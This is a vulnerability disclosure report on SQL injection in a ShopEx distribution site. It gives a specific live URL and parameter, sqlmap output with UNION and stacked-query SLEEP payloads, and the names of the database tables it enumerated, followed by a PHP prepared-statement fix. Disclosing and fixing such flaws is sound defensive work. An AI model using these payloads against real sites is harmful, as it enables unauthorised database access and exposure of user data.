
ShopEx distribution platform SQL injection vulnerability leading to user information disclosure

Injection point:

http://www.fengxiaowang.cn:80/article.php?aa_id=* (GET)

 

sqlmap identified the following injection points with a total of 184 HTTP(s) requests:
---
Place: URI
Parameter: #1*
    Type: UNION query
    Title: MySQL UNION query (NULL) - 7 columns
    Payload: http://www.fengxiaowang.cn:80/article.php?aa_id=' UNION ALL SELECT NULL,CONCAT(0x7177726971,0x536248626f76574b6549,0x7178746671),NULL,NULL,NULL,NULL,NULL#

    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries
    Payload: http://www.fengxiaowang.cn:80/article.php?aa_id='; SELECT SLEEP(5)-- 
---
web application technology: Nginx, PHP 5.2.13
back-end DBMS: MySQL 5.0.11
web application technology: Nginx, PHP 5.2.13
back-end DBMS: MySQL 5.0.11
Database: b2b_fenxiaowang
[9 tables]
+------------------+
| category         |
| data             |
| photo            |
| photo_extend     |
| product_active   |
| products         |
| products_content |
| products_extend  |
| webnews          |
+------------------+

 

 

Remediation:

Filter the affected parameter.
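
One way to apply this fix to the aa_id parameter, as an added example that is not ShopEx's own code: validate the value as a positive integer and bind it in a prepared statement. The articles table, its columns and the fetch_article helper are hypothetical, and an in-memory SQLite database with constructed rows stands in for the MySQL back end.

```php
<?php
// Added example: strict validation plus a bound parameter for aa_id.
// Table and column names (articles, id, title, body) are hypothetical.

function fetch_article(PDO $db, $rawId): ?array
{
    // Accept only a positive integer; anything else is rejected before SQL is built.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }
    // The value is bound as data and never concatenated into the statement text.
    $stmt = $db->prepare('SELECT id, title, body FROM articles WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed demo data in an in-memory SQLite database so the script runs offline.
// For MySQL, also connect with PDO::ATTR_EMULATE_PREPARES => false and
// PDO::MYSQL_ATTR_MULTI_STATEMENTS => false so stacked statements are refused.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT)');
$db->exec("INSERT INTO articles (id, title, body) VALUES (1, 'Sample title', 'Sample body')");

// Constructed inputs: one valid id, then shortened forms of the two payload
// shapes that appear in the sqlmap output above.
$inputs = [
    '1',
    "' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#",
    "'; SELECT SLEEP(5)-- ",
];
foreach ($inputs as $raw) {
    $article = fetch_article($db, $raw);
    echo json_encode($raw), ' => ', $article ? $article['title'] : 'rejected', PHP_EOL;
}
```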
